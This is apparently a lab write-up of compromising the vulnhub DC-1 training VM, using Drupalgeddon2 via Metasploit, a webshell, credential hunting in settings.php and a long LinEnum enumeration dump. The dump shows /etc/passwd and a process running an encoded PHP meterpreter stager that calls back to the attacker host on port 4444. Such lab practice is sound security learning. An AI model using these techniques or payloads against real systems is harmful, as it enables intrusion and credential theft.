vulnhub DC-1: Linux SUID privilege escalation

Set up the target VM. In bridged mode the IP was not visible, so I ran a masscan sweep of the /24 range for ports 80 and 8080.

Visiting the site showed it was running Drupal.

Pulled out msf and searched for Drupal modules.

Tried the most recent exploit:

 exploit/unix/webapp/drupal_drupalgeddon2

The attack succeeded and returned a meterpreter shell.

Did some basic information gathering.

Found that we were not root, so looked for a way to escalate privileges. First ran the usual Linux privilege-escalation check tool:

./Linux_Exploit_Suggester.pl

It returned no usable escalation suggestions, so I tried searchsploit against 3.2.0 (the kernel version).

The exp.c marked in the red box did not compile; that escalation attempt failed.

Uploaded shell.php and connected with China Chopper (菜刀) to browse files more easily.

Tried MySQL UDF privilege escalation on Linux.

The idea was to use China Chopper to look at the account the site uses to connect to the database and see whether it had high privileges.

/var/www/sites/default/settings.php

Found the username and password, but most likely not a high-privilege account.

Tried connecting.

It was not the root account.

Then ran the Linux privilege-escalation check script LinEnum.sh to look for weaknesses:

#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# version 0.95

[-] Debug Info
[+] Thorough tests = Disabled


Scan started at:
Tue May  7 01:08:48 AEST 2019


### SYSTEM ##############################################
[-] Kernel information:
Linux DC-1 3.2.0-6-486 #1 Debian 3.2.102-1 i686 GNU/Linux


[-] Kernel information (continued):
Linux version 3.2.0-6-486 (debian-kernel@lists.debian.org) (gcc version 4.9.2 (Debian 4.9.2-10+deb7u1) ) #1 Debian 3.2.102-1


[-] Specific release information:
PRETTY_NAME="Debian GNU/Linux 7 (wheezy)"
NAME="Debian GNU/Linux"
VERSION_ID="7"
VERSION="7 (wheezy)"
ID=debian
ANSI_COLOR="1;31"
HOME_URL="http://www.debian.org/"
SUPPORT_URL="http://www.debian.org/support/"
BUG_REPORT_URL="http://bugs.debian.org/"


[-] Hostname:
DC-1


### USER/GROUP ##########################################
[-] Current user/group info:
uid=33(www-data) gid=33(www-data) groups=33(www-data)


[-] Users that have previously logged onto the system:
Username         Port     From             Latest
root             tty1                      Thu Feb 28 12:10:51 +1000 2019


[-] Who else is logged on:
 01:08:48 up  1:00,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT


[-] Group memberships:
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(libuuid) gid=101(libuuid) groups=101(libuuid)
uid=101(Debian-exim) gid=104(Debian-exim) groups=104(Debian-exim)
uid=102(statd) gid=65534(nogroup) groups=65534(nogroup)
uid=103(messagebus) gid=107(messagebus) groups=107(messagebus)
uid=104(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=105(mysql) gid=109(mysql) groups=109(mysql)
uid=1001(flag4) gid=1001(flag4) groups=1001(flag4)


[-] Contents of /etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Debian-exim:x:101:104::/var/spool/exim4:/bin/false
statd:x:102:65534::/var/lib/nfs:/bin/false
messagebus:x:103:107::/var/run/dbus:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:105:109:MySQL Server,,,:/nonexistent:/bin/false
flag4:x:1001:1001:Flag4,,,:/home/flag4:/bin/bash


[-] Super user account(s):
root


[-] Are permissions on /home directories lax:
total 12K
drwxr-xr-x  3 root  root  4.0K Feb 19 23:51 .
drwxr-xr-x 23 root  root  4.0K Feb 19 22:34 ..
drwxr-xr-x  2 flag4 flag4 4.0K Feb 19 23:28 flag4


[-] Root is allowed to login via SSH:
PermitRootLogin yes


### ENVIRONMENTAL #######################################
[-] Environment information:
APACHE_PID_FILE=/var/run/apache2.pid
APACHE_RUN_USER=www-data
APACHE_LOG_DIR=/var/log/apache2
PATH=/usr/local/bin:/usr/bin:/bin
PWD=/var/www
APACHE_RUN_GROUP=www-data
LANG=C
SHLVL=1
APACHE_LOCK_DIR=/var/lock/apache2
APACHE_RUN_DIR=/var/run/apache2
_=/usr/bin/env


[-] Path information:
/usr/local/bin:/usr/bin:/bin


[-] Available shells:
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash


[-] Current umask value:
0022
u=rwx,g=rx,o=rx


[-] umask value as specified in /etc/login.defs:
UMASK        022


[-] Password and storage information:
PASS_MAX_DAYS    99999
PASS_MIN_DAYS    0
PASS_WARN_AGE    7
ENCRYPT_METHOD SHA512


### JOBS/TASKS ##########################################
[-] Cron jobs:
-rw-r--r-- 1 root root  722 Jul  4  2012 /etc/crontab

/etc/cron.d:
total 16
drwxr-xr-x  2 root root 4096 Feb 19 23:01 .
drwxr-xr-x 85 root root 4096 May  7 00:08 ..
-rw-r--r--  1 root root  102 Jul  4  2012 .placeholder
-rw-r--r--  1 root root  510 May 10  2018 php5

/etc/cron.daily:
total 68
drwxr-xr-x  2 root root  4096 Feb 19 23:01 .
drwxr-xr-x 85 root root  4096 May  7 00:08 ..
-rw-r--r--  1 root root   102 Jul  4  2012 .placeholder
-rwxr-xr-x  1 root root   633 May 30  2018 apache2
-rwxr-xr-x  1 root root 14985 Oct 24  2014 apt
-rwxr-xr-x  1 root root   314 Nov  5  2012 aptitude
-rwxr-xr-x  1 root root   355 Jun 11  2012 bsdmainutils
-rwxr-xr-x  1 root root   256 May  3  2016 dpkg
-rwxr-xr-x  1 root root  4125 Feb 11  2018 exim4-base
-rwxr-xr-x  1 root root    89 May 17  2012 logrotate
-rwxr-xr-x  1 root root  1365 Jun 19  2012 man-db
-rwxr-xr-x  1 root root   606 Sep 25  2010 mlocate
-rwxr-xr-x  1 root root   249 May 26  2012 passwd

/etc/cron.hourly:
total 12
drwxr-xr-x  2 root root 4096 Feb 19 22:25 .
drwxr-xr-x 85 root root 4096 May  7 00:08 ..
-rw-r--r--  1 root root  102 Jul  4  2012 .placeholder

/etc/cron.monthly:
total 12
drwxr-xr-x  2 root root 4096 Feb 19 22:25 .
drwxr-xr-x 85 root root 4096 May  7 00:08 ..
-rw-r--r--  1 root root  102 Jul  4  2012 .placeholder

/etc/cron.weekly:
total 16
drwxr-xr-x  2 root root 4096 Feb 19 22:25 .
drwxr-xr-x 85 root root 4096 May  7 00:08 ..
-rw-r--r--  1 root root  102 Jul  4  2012 .placeholder
-rwxr-xr-x  1 root root  907 Jun 19  2012 man-db


[-] Crontab contents:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user    command
17 *    * * *    root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#


### NETWORKING  ##########################################
[-] Network and IP info:
eth0      Link encap:Ethernet  HWaddr 00:0c:29:d1:f4:98
          inet addr:192.168.16.107  Bcast:192.168.16.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fed1:f498/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:8702 errors:0 dropped:0 overruns:0 frame:0
          TX packets:3009 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:1325354 (1.2 MiB)  TX bytes:1103771 (1.0 MiB)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:50 errors:0 dropped:0 overruns:0 frame:0
          TX packets:50 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:4852 (4.7 KiB)  TX bytes:4852 (4.7 KiB)


[-] ARP history:
192.168.16.254 dev eth0 lladdr 00:22:aa:d0:dd:95 REACHABLE
192.168.16.112 dev eth0 lladdr f0:18:98:6b:ed:5b REACHABLE


[-] Nameserver(s):
nameserver 192.168.16.254
nameserver 0.0.0.0


[-] Default route:
default via 192.168.16.254 dev eth0


[-] Listening TCP:
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:40858           0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN      -
tcp        0    480 192.168.16.107:33469    192.168.16.112:4444     ESTABLISHED 3406/php
tcp6       0      0 :::22                   :::*                    LISTEN      -
tcp6       0      0 ::1:25                  :::*                    LISTEN      -
tcp6       0      0 :::34190                :::*                    LISTEN      -
tcp6       0      0 :::111                  :::*                    LISTEN      -
tcp6       0      0 :::80                   :::*                    LISTEN      -
tcp6       0      0 192.168.16.107:80       192.168.16.112:52090    TIME_WAIT   -
tcp6       1      0 192.168.16.107:80       192.168.16.112:63539    CLOSE_WAIT  -


[-] Listening UDP:
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
udp        0      0 0.0.0.0:59942           0.0.0.0:*                           -
udp        0      0 0.0.0.0:68              0.0.0.0:*                           -
udp        0      0 0.0.0.0:111             0.0.0.0:*                           -
udp        0      0 0.0.0.0:769             0.0.0.0:*                           -
udp        0      0 127.0.0.1:801           0.0.0.0:*                           -
udp        0      0 0.0.0.0:21881           0.0.0.0:*                           -
udp6       0      0 :::52815                :::*                                -
udp6       0      0 :::28256                :::*                                -
udp6       0      0 :::111                  :::*                                -
udp6       0      0 :::769                  :::*                                -


### SERVICES #############################################
[-] Running processes:
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.0   2296   780 ?        Ss   00:08   0:01 init [2]
root         2  0.0  0.0      0     0 ?        S    00:08   0:00 [kthreadd]
root         3  0.0  0.0      0     0 ?        S    00:08   0:00 [ksoftirqd/0]
root         4  0.0  0.0      0     0 ?        S    00:08   0:00 [kworker/0:0]
root         6  0.0  0.0      0     0 ?        S    00:08   0:00 [watchdog/0]
root         7  0.0  0.0      0     0 ?        S<   00:08   0:00 [cpuset]
root         8  0.0  0.0      0     0 ?        S<   00:08   0:00 [khelper]
root         9  0.0  0.0      0     0 ?        S    00:08   0:00 [kdevtmpfs]
root        10  0.0  0.0      0     0 ?        S<   00:08   0:00 [netns]
root        11  0.0  0.0      0     0 ?        S    00:08   0:00 [sync_supers]
root        12  0.0  0.0      0     0 ?        S    00:08   0:00 [bdi-default]
root        13  0.0  0.0      0     0 ?        S<   00:08   0:00 [kintegrityd]
root        14  0.0  0.0      0     0 ?        S<   00:08   0:00 [kblockd]
root        15  0.0  0.0      0     0 ?        S    00:08   0:00 [khungtaskd]
root        16  0.0  0.0      0     0 ?        S    00:08   0:00 [kswapd0]
root        17  0.0  0.0      0     0 ?        SN   00:08   0:00 [ksmd]
root        18  0.0  0.0      0     0 ?        S    00:08   0:00 [fsnotify_mark]
root        19  0.0  0.0      0     0 ?        S<   00:08   0:00 [crypto]
root        95  0.0  0.0      0     0 ?        S    00:08   0:00 [khubd]
root       105  0.0  0.0      0     0 ?        S<   00:08   0:00 [ata_sff]
root       115  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_0]
root       125  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_1]
root       134  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_2]
root       135  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_3]
root       136  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_4]
root       137  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_5]
root       138  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_6]
root       139  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_7]
root       140  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_8]
root       141  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_9]
root       142  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_10]
root       143  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_11]
root       144  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_12]
root       145  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_13]
root       146  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_14]
root       147  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_15]
root       148  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_16]
root       149  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_17]
root       150  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_18]
root       151  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_19]
root       152  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_20]
root       153  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_21]
root       154  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_22]
root       155  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_23]
root       156  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_24]
root       157  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_25]
root       158  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_26]
root       159  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_27]
root       160  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_28]
root       161  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_29]
root       162  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_30]
root       163  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_31]
root       190  0.0  0.0      0     0 ?        S    00:08   0:00 [kworker/u:29]
root       191  0.0  0.0      0     0 ?        S    00:08   0:00 [kworker/u:30]
root       308  0.0  0.0      0     0 ?        S    00:08   0:00 [jbd2/sda1-8]
root       309  0.0  0.0      0     0 ?        S<   00:08   0:00 [ext4-dio-unwrit]
root       458  0.0  0.1   2688  1244 ?        Ss   00:08   0:00 udevd --daemon
root       543  0.0  0.0      0     0 ?        S<   00:08   0:00 [ttm_swap]
root       699  0.0  0.0      0     0 ?        S<   00:08   0:00 [kpsmoused]
root      1866  0.0  0.0   2388   904 ?        Ss   00:08   0:00 /sbin/rpcbind -w
statd     1897  0.0  0.1   2660  1280 ?        Ss   00:08   0:00 /sbin/rpc.statd
root      1902  0.0  0.0   2684   888 ?        S    00:08   0:00 udevd --daemon
root      1903  0.0  0.0      0     0 ?        S<   00:08   0:00 [rpciod]
root      1905  0.0  0.0      0     0 ?        S<   00:08   0:00 [nfsiod]
root      1912  0.0  0.0   2592   568 ?        Ss   00:08   0:00 /usr/sbin/rpc.idmapd
root      2215  0.0  0.2  28352  2080 ?        Sl   00:08   0:00 /usr/sbin/rsyslogd -c5
root      2267  0.0  0.0   1892   608 ?        Ss   00:08   0:00 /usr/sbin/acpid
root      2303  0.0  0.8  43680  8928 ?        Ss   00:08   0:00 /usr/sbin/apache2 -k start
daemon    2347  0.0  0.0   2168   316 ?        Ss   00:08   0:00 /usr/sbin/atd
103       2353  0.0  0.0   3032   644 ?        Ss   00:08   0:00 /usr/bin/dbus-daemon --system
www-data  2381  0.0  1.3  48448 14420 ?        S    00:08   0:00 /usr/sbin/apache2 -k start
www-data  2382  0.0  1.2  47424 13408 ?        S    00:08   0:00 /usr/sbin/apache2 -k start
www-data  2383  0.0  1.4  47676 14836 ?        S    00:08   0:01 /usr/sbin/apache2 -k start
www-data  2384  0.0  1.1  46148 12080 ?        S    00:08   0:00 /usr/sbin/apache2 -k start
root      2438  0.0  0.0   3852   988 ?        Ss   00:08   0:00 /usr/sbin/cron
root      2493  0.0  0.0   1948   588 ?        S    00:08   0:00 /bin/sh /usr/bin/mysqld_safe
mysql     2831  0.0  4.7 329380 49184 ?        Sl   00:08   0:02 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/mysql/plugin --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock --port=3306
root      2832  0.0  0.0   1868   604 ?        S    00:08   0:00 logger -t mysqld -p daemon.error
101       3228  0.0  0.0   7424   992 ?        Ss   00:08   0:00 /usr/sbin/exim4 -bd -q30m
root      3281  0.0  0.0   3796   840 tty2     Ss+  00:08   0:00 /sbin/getty 38400 tty2
root      3282  0.0  0.0   3796   836 tty3     Ss+  00:08   0:00 /sbin/getty 38400 tty3
root      3283  0.0  0.0   3796   840 tty4     Ss+  00:08   0:00 /sbin/getty 38400 tty4
root      3284  0.0  0.0   3796   836 tty5     Ss+  00:08   0:00 /sbin/getty 38400 tty5
root      3285  0.0  0.0   3796   840 tty6     Ss+  00:08   0:00 /sbin/getty 38400 tty6
root      3287  0.0  0.0      0     0 ?        S    00:08   0:00 [flush-8:0]
root      3298  0.0  0.2   5196  2320 ?        Ss   00:08   0:00 dhclient -v -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases eth0
root      3339  0.0  0.1   6496  1076 ?        Ss   00:08   0:00 /usr/sbin/sshd
root      3354  0.0  0.0   3796   840 tty1     Ss+  00:09   0:00 /sbin/getty 38400 tty1
www-data  3358  0.0  1.5  49688 15620 ?        S    00:18   0:00 /usr/sbin/apache2 -k start
www-data  3360  0.0  1.1  45892 11832 ?        S    00:18   0:00 /usr/sbin/apache2 -k start
www-data  3361  0.0  1.6  51624 16812 ?        S    00:18   0:00 /usr/sbin/apache2 -k start
www-data  3381  0.0  1.1  45892 11828 ?        S    00:32   0:00 /usr/sbin/apache2 -k start
www-data  3385  0.0  1.2  47436 13392 ?        S    00:32   0:00 /usr/sbin/apache2 -k start
www-data  3386  0.0  1.2  47416 13320 ?        S    00:32   0:00 /usr/sbin/apache2 -k start
www-data  3405  0.0  0.0   1948   540 ?        S    00:39   0:00 sh -c php -r 'eval(base64_decode([...].KCJObGVuIiwgJGxlbik7ICRsZW4gPSAkYVsnbGVuJ107ICRiID0gJyc7IHdoaWxlIChzdHJsZW4oJGIpIDwgJGxlbikgeyBzd2l0Y2ggKCRzX3R5cGUpIHsgY2FzZSAnc3RyZWFtJzogJGIgLj0gZnJlYWQoJHMsICRsZW4tc3RybGVuKCRiKSk7IGJyZWFrOyBjYXNlICdzb2NrZXQnOiAkYiAuPSBzb2NrZXRfcmVhZCgkcywgJGxlbi1zdHJsZW4oJGIpKTsgYnJlYWs7IH0gfSAkR0xPQkFMU1snbXNnc29jayddID0gJHM7ICRHTE9CQUxTWydtc2dzb2NrX3R5cGUnXSA9ICRzX3R5cGU7IGlmIChleHRlbnNpb25fbG9hZGVkKCdzdWhvc2luJykgJiYgaW5pX2dldCgnc3Vob3Npbi5leGVjdXRvci5kaXNhYmxlX2V2YWwnKSkgeyAkc3Vob3Npbl9ieXBhc3M9Y3JlYXRlX2Z1bmN0aW9uKCcnLCAkYik7ICRzdWhvc2luX2J5cGFzcygpOyB9IGVsc2UgeyBldmFsKCRiKTsgfSBkaWUoKTs));'
www-data  3406  0.0  0.8  41132  9032 ?        S    00:39   0:01 php -r eval(base64_decode([...].[...]));
www-data  3408  0.0  0.0   1948   520 ?        S    00:40   0:00 sh -c /bin/sh
www-data  3409  0.0  0.0   1948   576 ?        S    00:40   0:00 /bin/sh
root      3488  0.0  0.0      0     0 ?        S    01:01   0:00 [kworker/0:1]
root      4393  0.0  0.0      0     0 ?        S    01:07   0:00 [kworker/0:2]
www-data  4398  0.0  0.1   3500  1764 ?        S    01:08   0:00 /bin/bash ./LinEnum.sh
www-data  4399  0.0  0.1   3552  1380 ?        S    01:08   0:00 /bin/bash ./LinEnum.sh
www-data  4400  0.0  0.0   1876   452 ?        S    01:08   0:00 tee -a
www-data  4570  0.0  0.1   3536  1092 ?        S    01:08   0:00 /bin/bash ./LinEnum.sh
www-data  4571  0.0  0.0   2832   996 ?        R    01:08   0:00 ps aux


[-] Process binaries and associated permissions (from above list):
-rwxr-xr-x 1 root root   941252 Oct 27  2016 /bin/bash
lrwxrwxrwx 1 root root        4 Mar  1  2012 /bin/sh -> dash
-rwxr-xr-x 2 root root    26684 Dec 10  2012 /sbin/getty
-rwxr-xr-x 1 root root    68180 May 22  2013 /sbin/rpc.statd
-rwxr-xr-x 1 root root    42836 May 10  2017 /sbin/rpcbind
-rwxr-xr-x 1 root root   436576 Feb 10  2015 /usr/bin/dbus-daemon
-rwxr-xr-x 1 root root    42748 Apr 16  2013 /usr/sbin/acpid
lrwxrwxrwx 1 root root       34 May 30  2018 /usr/sbin/apache2 -> ../lib/apache2/mpm-prefork/apache2
-rwxr-xr-x 1 root root    21812 Oct  4  2014 /usr/sbin/atd
-rwxr-xr-x 1 root root    43020 Jul  4  2012 /usr/sbin/cron
-rwsr-xr-x 1 root root   937564 Feb 11  2018 /usr/sbin/exim4
-rwxr-xr-x 1 root root 10585256 Apr 20  2018 /usr/sbin/mysqld
-rwxr-xr-x 1 root root    28832 May 22  2013 /usr/sbin/rpc.idmapd
-rwxr-xr-x 1 root root   388200 Oct  8  2014 /usr/sbin/rsyslogd
-rwxr-xr-x 1 root root   531888 Jan 27  2018 /usr/sbin/sshd


[-] /etc/init.d/ binary permissions:
total 280
drwxr-xr-x  2 root root 4096 Feb 19 23:01 .
drwxr-xr-x 85 root root 4096 May  7 00:08 ..
-rw-r--r--  1 root root 1586 Feb 19 23:02 .depend.boot
-rw-r--r--  1 root root  669 Feb 19 23:02 .depend.start
-rw-r--r--  1 root root  769 Feb 19 23:02 .depend.stop
-rw-r--r--  1 root root 2427 Oct 16  2012 README
-rwxr-xr-x  1 root root 2227 Apr 16  2013 acpid
-rwxr-xr-x  1 root root 7820 May 26  2018 apache2
-rwxr-xr-x  1 root root 1071 Jun 25  2011 atd
-rwxr-xr-x  1 root root 1276 Oct 16  2012 bootlogs
-rwxr-xr-x  1 root root 1281 Jul 15  2013 bootmisc.sh
-rwxr-xr-x  1 root root 3816 Jul 15  2013 checkfs.sh
-rwxr-xr-x  1 root root 1099 Jul 15  2013 checkroot-bootclean.sh
-rwxr-xr-x  1 root root 9673 Jul 15  2013 checkroot.sh
-rwxr-xr-x  1 root root 1379 Dec  9  2011 console-setup
-rwxr-xr-x  1 root root 3033 Jul  3  2012 cron
-rwxr-xr-x  1 root root 2813 Feb  6  2015 dbus
-rwxr-xr-x  1 root root 6435 Feb 11  2018 exim4
-rwxr-xr-x  1 root root 1329 Oct 16  2012 halt
-rwxr-xr-x  1 root root 1423 Oct 16  2012 hostname.sh
-rwxr-xr-x  1 root root 3880 Dec 10  2012 hwclock.sh
-rwxr-xr-x  1 root root 7592 Apr 28  2012 kbd
-rwxr-xr-x  1 root root 1591 Oct  1  2012 keyboard-setup
-rwxr-xr-x  1 root root 1293 Oct 16  2012 killprocs
-rwxr-xr-x  1 root root 1990 May 21  2012 kmod
-rwxr-xr-x  1 root root 2405 Sep 26  2016 mcstrans
-rwxr-xr-x  1 root root  995 Oct 16  2012 motd
-rwxr-xr-x  1 root root  670 Feb 24  2013 mountall-bootclean.sh
-rwxr-xr-x  1 root root 2128 Feb 24  2013 mountall.sh
-rwxr-xr-x  1 root root 1508 Jul 15  2013 mountdevsubfs.sh
-rwxr-xr-x  1 root root 1413 Jul 15  2013 mountkernfs.sh
-rwxr-xr-x  1 root root  678 Feb 24  2013 mountnfs-bootclean.sh
-rwxr-xr-x  1 root root 2440 Oct 16  2012 mountnfs.sh
-rwxr-xr-x  1 root root 1731 Jul 15  2013 mtab.sh
-rwxr-xr-x  1 root root 5437 Apr 19  2018 mysql
-rwxr-xr-x  1 root root 4322 Mar 14  2013 networking
-rwxr-xr-x  1 root root 6491 May 22  2013 nfs-common
-rwxr-xr-x  1 root root 1346 May 20  2012 procps
-rwxr-xr-x  1 root root 6120 Oct 16  2012 rc
-rwxr-xr-x  1 root root  782 Oct 16  2012 rc.local
-rwxr-xr-x  1 root root  117 Oct 16  2012 rcS
-rwxr-xr-x  1 root root  639 Oct 16  2012 reboot
-rwxr-xr-x  1 root root 2727 Sep 26  2016 restorecond
-rwxr-xr-x  1 root root 1074 Jul 15  2013 rmnologin
-rwxr-xr-x  1 root root 2344 May 10  2017 rpcbind
-rwxr-xr-x  1 root root 3054 Oct  8  2014 rsyslog
-rwxr-xr-x  1 root root 3200 Oct 16  2012 sendsigs
-rwxr-xr-x  1 root root  590 Oct 16  2012 single
-rw-r--r--  1 root root 4290 Oct 16  2012 skeleton
-rwxr-xr-x  1 root root 3881 Apr 15  2016 ssh
-rwxr-xr-x  1 root root 8827 Nov  9  2012 udev
-rwxr-xr-x  1 root root 1179 Aug 20  2012 udev-mtab
-rwxr-xr-x  1 root root 2721 Apr 10  2013 umountfs
-rwxr-xr-x  1 root root 2195 Apr 10  2013 umountnfs.sh
-rwxr-xr-x  1 root root 1122 Oct 16  2012 umountroot
-rwxr-xr-x  1 root root 3111 Oct 16  2012 urandom
-rwxr-xr-x  1 root root 1364 Oct 26  2015 virtualbox-guest-utils
-rwxr-xr-x  1 root root 2666 Mar  3  2012 x11-common


[-] /etc/init/ config file permissions:
total 48
drwxr-xr-x  2 root root 4096 Feb 19 22:25 .
drwxr-xr-x 85 root root 4096 May  7 00:08 ..
-rw-r--r--  1 root root  523 Mar 14  2013 network-interface-container.conf
-rw-r--r--  1 root root 1603 Mar 14  2013 network-interface-security.conf
-rw-r--r--  1 root root  803 Mar 14  2013 network-interface.conf
-rw-r--r--  1 root root 1898 Mar 14  2013 networking.conf
-rw-r--r--  1 root root  567 Feb 24  2013 startpar-bridge.conf
-rw-r--r--  1 root root  637 Nov  5  2012 udev-fallback-graphics.conf
-rw-r--r--  1 root root  769 Nov  5  2012 udev-finish.conf
-rw-r--r--  1 root root  322 Nov  5  2012 udev.conf
-rw-r--r--  1 root root  356 Nov  5  2012 udevmonitor.conf
-rw-r--r--  1 root root  352 Nov  5  2012 udevtrigger.conf


[-] /lib/systemd/* config file permissions:
/lib/systemd/:
total 4.0K
drwxr-xr-x 6 root root 4.0K Feb 19 22:43 system

/lib/systemd/system:
total 56K
drwxr-xr-x 2 root root 4.0K Feb 19 22:43 dbus.target.wants
drwxr-xr-x 2 root root 4.0K Feb 19 22:43 multi-user.target.wants
drwxr-xr-x 2 root root 4.0K Feb 19 22:43 sockets.target.wants
drwxr-xr-x 2 root root 4.0K Feb 19 22:25 basic.target.wants
-rw-r--r-- 1 root root  353 Feb 10  2015 dbus.service
-rw-r--r-- 1 root root  106 Feb 10  2015 dbus.socket
-rw-r--r-- 1 root root  190 Oct  8  2014 rsyslog.service
-rw-r--r-- 1 root root  164 Apr 29  2013 udev-control.socket
-rw-r--r-- 1 root root  177 Apr 29  2013 udev-kernel.socket
-rw-r--r-- 1 root root  752 Apr 29  2013 udev-settle.service
-rw-r--r-- 1 root root  291 Apr 29  2013 udev-trigger.service
-rw-r--r-- 1 root root  384 Apr 29  2013 udev.service
-rw-r--r-- 1 root root  155 Apr 16  2013 acpid.service
-rw-r--r-- 1 root root  115 Apr 16  2013 acpid.socket

/lib/systemd/system/dbus.target.wants:
total 0
lrwxrwxrwx 1 root root 14 Feb 10  2015 dbus.socket -> ../dbus.socket

/lib/systemd/system/multi-user.target.wants:
total 0
lrwxrwxrwx 1 root root 15 Feb 10  2015 dbus.service -> ../dbus.service

/lib/systemd/system/sockets.target.wants:
total 0
lrwxrwxrwx 1 root root 14 Feb 10  2015 dbus.socket -> ../dbus.socket
lrwxrwxrwx 1 root root 22 Apr 29  2013 udev-control.socket -> ../udev-control.socket
